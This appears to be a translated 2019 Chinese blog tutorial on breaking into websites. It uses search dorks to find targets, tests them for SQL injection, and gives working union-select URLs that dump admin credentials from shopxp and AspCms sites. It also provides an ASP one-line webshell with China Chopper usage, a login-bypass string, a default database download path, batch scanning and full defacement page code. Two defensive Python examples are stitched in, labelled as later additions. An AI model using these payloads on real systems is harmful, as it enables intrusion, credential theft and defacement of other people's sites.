By_jie

xh_Zero-basics website penetration, part 1

1. Recognising common website types

  1.1 ASP: ASP is short for Active Server Pages. It is an application developed by Microsoft to replace CGI scripts; it can interact with databases and other programs and is a simple, convenient programming tool. ASP page files use the extensions .asp and .aspx, and ASP is commonly used in all kinds of dynamic sites today.

  1.2 PHP: PHP originally stood for Personal Home Page and has been officially renamed "PHP: Hypertext Preprocessor" (note that it is not an abbreviation of "Hypertext Preprocessor"); its Chinese name is 超文本预处理器. It is a general-purpose open-source scripting language. Its syntax borrows from C, Java and Perl, which makes it easy to learn; it is widely used, mainly in web development. PHP's distinctive syntax mixes C, Java, Perl and constructs of its own. It can execute dynamic pages faster than CGI or Perl. Compared with other languages, PHP embeds the program into the HTML document (an application of SGML) and executes it there, which is considerably more efficient than a CGI that generates every HTML tag itself; PHP can also run compiled code, and compiling both protects and optimises the code so it runs faster.

  1.3 HTML: HyperText Markup Language, an application of SGML. HTML is not a programming language but a markup language, and it is indispensable for building web pages.
"Hypertext" means that a page can contain non-text elements such as images, links, even music and programs.
An HTML document consists of a head and a body: the head provides information about the page, and the body provides the page's actual content.

2. Recognising, identifying and searching for websites with SQL injection vulnerabilities
  2.1 Understanding SQL injection

    SQL injection means inserting SQL commands into a web form submission, an input field, a domain name or the query string of a page request so as to trick the server into executing malicious SQL. Specifically, it abuses an existing application's ability to pass (malicious) SQL to the back-end database engine for execution: by entering (malicious) SQL statements in a web form, an attacker obtains the database of a vulnerable site instead of having the SQL executed as the designer intended. [1] For example, many earlier leaks of VIP member passwords from video sites were obtained by submitting query strings through web forms; such forms are particularly prone to SQL injection attacks.

  2.2 Identifying websites with SQL injection vulnerabilities
    Append text to a parameterised URL such as http://www.xxx.com/xxx/xxx.jsp?id=xxx: if and 1=1 (http://www.xxx.com/xxx/xxx.jsp?id=xxx and 1=1) returns the normal page and and 1=2 (http://www.xxx.com/xxx/xxx.jsp?id=xxx and 1=2) returns an error, then that type of site has a SQL injection vulnerability.
  2.3 Searching for websites with SQL injection vulnerabilities (tools will be used later)
    inurl:.jsp?id=xxx: searches for all sites whose URL contains .jsp?id=xxx. Then use 2.2 to verify whether the site has a SQL injection vulnerability.

3. Making your own defacement page (黑页)

<div class="ag" style="color:#F00;"><marquee behavior="scroll" scrollamount="2" onmouseout="this.start();" onmouseover="this.stop()">
<b>您好!xxx低调路过你的网站!请尽快修复漏洞!</b></marquee></div>

<table width="759" align="center" bgcolor="#000000">
  <tbody>
    <tr>
      <td height="18" width="765" align="middle"><p class="STYLE33">
        <script>

farbbibliothek = new Array(); 

farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 

farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); 

farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); 

farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 

farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 

farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); 

farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 

farben = farbbibliothek[4];

function farbschrift() 

{ 

for(var i=0 ; i<Buchstabe.length; i++) 

{ 

document.all["a"+i].style.color=farben[i]; 

} 

farbverlauf(); 

} 

function string2array(text) 

{ 

Buchstabe = new Array(); 

while(farben.length<text.length) 

{ 

farben = farben.concat(farben); 

} 

k=0; 

while(k<=text.length) 

{ 

Buchstabe[k] = text.charAt(k); 


k++; 

} 

} 

function divserzeugen() 

{ 

for(var i=0 ; i<Buchstabe.length; i++) 

{ 

document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 

} 

farbschrift(); 

} 

var a=1; 

function farbverlauf() 

{ 

for(var i=0 ; i<farben.length; i++) 

{ 

farben[i-1]=farben[i]; 

} 

farben[farben.length-1]=farben[-1]; 



setTimeout("farbschrift()",30); 

} 



var farbsatz=1; 

function farbtauscher() 

{ 

farben = farbbibliothek[farbsatz]; 

while(farben.length<text.length) 

{ 

farben = farben.concat(farben); 

} 

farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 

} 

setInterval("farbtauscher()",5000); 

text= "xxx低调路过~"; //h 

string2array(text); 

divserzeugen(); 

//document.write(text); 

</script>
      </p></td>
    </tr>
  </tbody>
</table>
<p>&nbsp;</p>
</body>
</html>


<!-- saved from url=(0017)http://cybsg.com/ -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Generated by F12 developer tools. This might not be an accurate representation of the original source file -->
<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><META content="IE=7.0000" http-equiv="X-UA-Compatible">
<SCRIPT language=javascript> function click() { if (event.button==2) { alert('xxx在此路过! ') } } document.onmousedown=click </SCRIPT>

<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<STYLE type=text/css>
BODY {
    BACKGROUND-COLOR: #000000;
    MARGIN-TOP: 0px;
    MARGIN-LEFT: 0px;
    background-image: url();
    background-repeat: repeat;
}
#Layer1 {
    BACKGROUND-IMAGE: url(http://imgdata.hoop8.com/1401/518-1220317729.jpg); Z-INDEX: 1; POSITION: absolute; BACKGROUND-COLOR: #000000; WIDTH: 100%; HEIGHT: 100%
}
#Layer2 {
    Z-INDEX: 1; POSITION: absolute; WIDTH: 1109px; HEIGHT: 115px; TOP: 119px; LEFT: 173px
}
.STYLE4 {
    COLOR: #ff0000; FONT-SIZE: 12px
}
.STYLE6 {
    COLOR: #ffffff
}<script language="JavaScript" src="http://www.3v.cm/count.asp?id=lizhaowei"></script>
#Layer3 {
    Z-INDEX: 1; POSITION: absolute; WIDTH: 100%; HEIGHT: 100%
}
.STYLE11 {font-size: 50px}
.STYLE13 {color: #00CCFF}
.STYLE14 {color: #00FF99}
a:link {
    color: #FF0000;
}
a:visited {
    color: #FF0000;
}
.STYLE16 {
    font-size: 36px;
    font-weight: bold;
}
</STYLE>
</HEAD>
<BODY>
<P class=STYLE4 align=center> <font color="#f0dad2"><font color="#f0dad2"><font color="#f0dad2"><font color="#f0dad2"> </font></font></font></font>
  <embed height="0" type="application/x-shockwave-flash" align="center" width="0" src="http://divine-music.info/musicfiles/03%20Y'all%20Want%20a%20Single.swf" loop="True" autostart="True"></embed>
</P>
<P class=STYLE4 align=center><big><a href="<a target="_blank" href="" alt="http://wpa.qq.com/msgrd?v=3&uin=1330231906&site=qq&menu=yes"/></a><span class="STYLE11"></span></big></P>
<hr />
<P class=STYLE4 align=center><span class="STYLE16">xxx低调路过贵站,请尽快修复漏洞</span><br />
</P>
<P class=STYLE4 align=center><img src="http://y.photo.qq.com/img?s=CDyfm6URO&l=y.jpg" width="500" height="360" /></P>
<P class=STYLE4 align=center>xxx到此一游 | 本次检测属友情检测</P>
<hr />
<P class=STYLE4 align=center><a href=" " target="_blank">天赋异能 誰与争锋</a> | <a href=" " target="_blank">黑客的精神不在乎技术的高超!</a> |<a href=" " target="_blank"> 而是只在乎他对这种精神的追求</a> | <a href=" " target="_blank">不要拿黑与白的对立,来衡量你与我之间的距离!</a> | <a href=" " target="_blank">我只是友情监测!</a> | <a href=" " target="_blank">请见快修复你的漏洞</a></P>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"1","bdPos":"right","bdTop":"100"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>

<SCRIPT LANGUAGE="JavaScript"> 
<!-- 
var Message="我是xxx,现在低调路过你的网站,请尽快修复漏洞"; 
var place=1; 
function scrollIn() { 
window.status=Message.substring(0, place); 
if (place >= Message.length) { 
place=1; 
window.setTimeout("Helpor_net()",300); 
} else { 
place++; 
window.setTimeout("scrollIn()",50); 
} 
} 
function Helpor_net() { 
window.status=Message.substring(place, Message.length); 
if (place >= Message.length) { 
place=1; 
window.setTimeout("scrollIn()", 100); 
} else { 
place++; 
window.setTimeout("Helpor_net()", 50); 
} 
} 
Helpor_net(); 
--> 
</SCRIPT>
<p class=MsoNormal><span lang=EN-US>
<script language="JavaScript"> 
<!--  
if (document.all){ 
Cols=23; 
Cl=22; 
Cs=40; 
Ts=10; 
Tc='#008800'; 
Tc1='#00ff00'; 
MnS=20; 
MxS=40; 
I=Cs; 
Sp=new Array();S=new Array();Y=new Array(); 
C=new Array();M=new Array();B=new Array(); 
RC=new Array();E=new Array();Tcc=new Array(0,1); 
document.write("<div id='Container' style='position:absolute;top:0;left:-"+Cs+"'>"); 
document.write("<div style='position:relative'>"); 
for(i=0; i < Cols; i++){ 
S[i]=I+=Cs; 
document.write("<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:" 
+Ts+"px;left:"+S[i]+";width:"+Ts+"px;height:0px;color:"+Tc+";visibility:hidden'></div>"); 
} 
document.write("</div></div>"); 

for(j=0; j < Cols; j++){ 
RC[j]=1+Math.round(Math.random()*Cl);   
Y[j]=0; 
Sp[j]=Math.round(MnS+Math.random()*MxS);  
for(i=0; i < RC[j]; i++){ 
 B[i]=''; 
 C[i]=Math.round(Math.random()*1)+' '; 
 M[j]=B[0]+=C[i]; 
 } 
} 
function Cycle(){ 
Container.style.top=window.document.body.scrollTop; 
for (i=0; i < Cols; i++){ 
var r = Math.floor(Math.random()*Tcc.length); 
E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; 
Y[i]+=Sp[i]; 

if (Y[i] > window.document.body.clientHeight){ 
 for(i2=0; i2 < Cols; i2++){ 
 RC[i2]=1+Math.round(Math.random()*Cl);   
 for(i3=0; i3 < RC[i2]; i3++){ 
 B[i3]=''; 
 C[i3]=Math.round(Math.random()*1)+' '; 
 C[Math.floor(Math.random()*i2)]=' '+' '; 
 M[i]=B[0]+=C[i3]; 
 Y[i]=-Ts*M[i].length/1.5; 
 A[i].style.visibility='visible'; 
 } 
 Sp[i]=Math.round(MnS+Math.random()*MxS); 
 } 
} 
A[i].style.top=Y[i]; 
A[i].innerHTML=M[i]+' '+E[i]+' '; 
} 
setTimeout('Cycle()',20) 
} 
Cycle(); 
} 
-->
</script></span></p>
</div>
</body>
</html>

<center>
<font face=calibri color="#FF0000" size=3>
<div align="center"><br><img src="#" width="550" height="27"
<div align="center"> 
<br>
<MARQUEE class=lm_tipBox 
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; WIDTH: 500px; COLOR: #FF0000; PADDING-TOP: 0px; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Monotype Corsiva; HEIGHT: 16px" 
width=581 
height=4>“ 我们是xxx,当您看到这里的时候,证明您的网站已被黑.”
</MARQUEE></B><FONT color=white <FONT>
<font face=calibri color="#FF00000" size=4><b>
</marquee>
</center>

</BODY>
</HTML>

4. How to use a SQL injection vulnerability to break into a website

  Once you have confirmed that a site has a SQL injection vulnerability, how do you use it to penetrate further? Say we used section 2 to verify that the URL http://www.xxx.com/xxx/xxx.jsp?id=x really is injectable. We can paste that URL into the URL field of Pangolin 1.2 and run a check: it checks out table names, the fields in each table, and so on. The precondition, of course, is that you have a strong dictionary backing the check; you can also configure the table names, column names and other details to scan for according to the injectable site (common practice). Step by step this scans out the site's usernames and passwords (usually MD5-hashed). With a username and password in hand, take the protocol plus domain of that URL, http://www.xxx.com/, and use the Yujian (御剑) backend scanner to find the site's admin login page, then log in. Once logged in we are the site's top administrator: we can do whatever we want, make the site display and serve whatever we want, upload whatever trojan (big or small shell) we want, because we hold the site's highest administrative privilege. A friendly reminder though: better not to act recklessly and do whatever you please, because your wilfulness may land you in prison (are there really so few cautionary examples in real life?).

5. Website penetration + upload

  Practical exercise of section 4.

6. Lesson five: obtaining the backend account and password through the vulnerability

  6.1 Search keyword: inurl:shopxp_news.asp

  6.2 protocol://domain/ + TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin


    This returns the MD5-hashed administrator password; crack it with somd5, then scan for the backend login page with Yujian and log in.

8. Penetrating a QQ tutorial site: grab the database and crack QQ passwords

  Keyword: 教程网圆你网络之梦
  Default database download path: domain + /_data/_dk_$%25%5e&.mdb

  After downloading, open it with Mingxiaozi (明小子).

9. Flooding a website with packets

  Packet flooding is mainly used against smaller sites (the server cannot keep up with the clients' requests and goes down).

  Screenshot (not reproduced in the text).

11. Exploiting the AspCms vulnerability

  Precondition: the site must run AspCms.

domain + admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1

  After logging in (screenshots not reproduced in the text):

    One-line trojan (一句话木马): <%eval request("连接密码")%>

  Open the file you just added, copy its link address (URL) and connect to it with China Chopper (中国菜刀). You can then upload your own defacement page to the web root.

  Once the defacement page has been uploaded successfully, it can be reached at protocol + domain/ + full page name.
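The one-line ASP backdoor above is what a defender should be hunting for in any directory that accepts uploads. As an added example, not from the original post or any project, the following scans a directory tree for that eval/execute request() pattern and for any server-side script sitting where only user uploads belong; the regex, the extension list and the sample files are this example's own constructions.

```python
import os
import re
import tempfile

# The one-line ASP backdoor shape shown in the post, <%eval request("...")%>,
# plus the execute() form; whitespace and case are ignored.
SHELL_RE = re.compile(rb"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.IGNORECASE)
# Extensions the web server would execute; none of these belong in an upload tree.
SCRIPT_EXT = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".ashx", ".asmx", ".php", ".jsp"}

def scan_tree(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(full, "rb") as fh:
                head = fh.read(1 << 20)        # a one-liner is always near the top
            if SHELL_RE.search(head):
                hits.append((rel, "eval/execute request() webshell pattern"))
            elif ext in SCRIPT_EXT:
                hits.append((rel, "server-side script in upload directory"))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed upload directory for the demo; the contents are not real uploads."""
    samples = {
        "uploads/avatar.jpg": b"\xff\xd8\xff\xe0JFIF-sample-bytes",
        "uploads/notes.txt": b"plain text, nothing to see",
        "uploads/2019/pic.asp": b'<%eval request("pw")%>',
        "uploads/helper.aspx": b'<%@ Page Language="C#" %>',
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

def demo():
    """Build the sample tree in a temporary directory, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

A literal match like this catches the plain one-liner only; a file-integrity baseline of the web root and disabling script execution for upload directories at the web-server level cover the cases a pattern cannot.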

12. Batch-scanning AspCms sites and verifying the vulnerability

  12.1 Keywords

  Save the following keywords to xxx.txt:

Powered by AspCms2
Powered by AspCms2.0
AspCms2
AspCms2.0
Powered

  12.2 Use a URL harvesting tool to collect sites containing these keywords

  After harvesting, export all the sites containing the keywords to xxx.txt, then scan them for the AspCms vulnerability with a batch vulnerability scanner (MScan).

  12.3 How to exploit the AspCms vulnerability

   See section 11.

13. Finding phpweb vulnerable sites

  13.1 Keywords

inurl:/class/?1.html
inurl:class/index.php?catid=0
inurl:/page/html/?1.html

  Default backend: domain + /admin.php

  Injection points:

down/class/index.php?myord=1
news/class/index.php?showtag=

  13.2 Keywords (recommended)

inurl:news/html/?411.html

  Default backend: domain + /admin.php, so batch-scan by configuring Yujian accordingly (the configuration screenshot is not reproduced in the text).

  Universal password: admin 'or '1'='1
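The universal password only works against a login that pastes the submitted fields straight into its SQL text, which is the injection mechanism 2.1 describes. As an added example, not phpweb's code and using an SQLite stand-in table constructed here, the string-built query is shown beside the parameterised one that defeats it:

```python
import sqlite3

UNIVERSAL = "admin 'or '1'='1"      # the payload quoted in the post

def make_db():
    """In-memory stand-in for a CMS admin table (constructed for this example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'S3cret!')")
    return db

def login_concat(db, username, password):
    """Query built by string formatting: the shape the universal password needs.
    With the payload in both fields the WHERE clause becomes
      username='admin 'or '1'='1' AND password='admin 'or '1'='1'
    and the trailing OR '1'='1' makes it true for every row."""
    sql = ("SELECT username FROM admin WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_param(db, username, password):
    """Parameterised query: the driver binds the values, so quote characters
    inside them stay data and never become SQL syntax."""
    row = db.execute(
        "SELECT username FROM admin WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    print("string-built login accepts payload:", login_concat(db, UNIVERSAL, UNIVERSAL))
    print("parameterised login accepts payload:", login_param(db, UNIVERSAL, UNIVERSAL))
    print("parameterised login, real credentials:", login_param(db, "admin", "S3cret!"))
```

Hashing the stored password (the post notes these are usually MD5) changes nothing here, because the injection happens in the query text before any comparison; binding parameters is the fix, and a slow password hash such as bcrypt is what makes a dumped table hard to crack with a service like somd5.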

14.

 

posted @ 2019-05-28 16:17 by 1024军团